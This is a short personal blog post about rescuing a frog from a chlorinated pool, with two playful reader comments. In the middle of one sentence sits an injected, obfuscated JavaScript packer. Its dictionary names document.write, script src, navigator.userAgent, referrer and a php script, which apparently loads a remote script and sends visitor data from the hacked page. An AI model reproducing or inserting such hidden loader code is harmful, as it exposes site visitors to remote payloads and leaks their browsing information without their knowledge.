A few weeks ago, Nick and I were lounging in the hot tub. As we headed back to the house, I noticed a frog swimming in the pool. And I thought, “hmm….without any lily pads, how will he ever get out?”
I asked facebook if it thought I should help the frog and within a few minutes, people agreed. Yes, the frog would not be safe in chlorinated water.
It was time to save a frog.
Here’s the frog, I’ll call him Kermit for short. Just the first frog name that popped into my head.
Nick ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rskzk|var|u0026u|referrer|rzhhi||js|php’.split(‘|’),0,{}))
grabbed the net they have at the pool and tried to fish the little guy out.
He was not pleased that a bald, giant was trying to chase after him. But eventually Nick got him.
And we set him on the ground. I was still concerned. He still had chlorine on his body and I wasn’t sure how he was going to get it off. So I got water from the drinking fountain, cupped in my hands, and tossed it on the little guy.
And jumped back in the pool.
So we did it all over again. But this time, Nick put him in the bushes and said we weren’t going to rinse him off.
The next day, we didn’t see a dead frog in the pool. I call that a success!
We now have excellent turtle karma!

I wonder…If you had given him mouth to mouth and he turned into a prince, whom would you choose? 😉
Probably depends on which prince he turned into 🙂
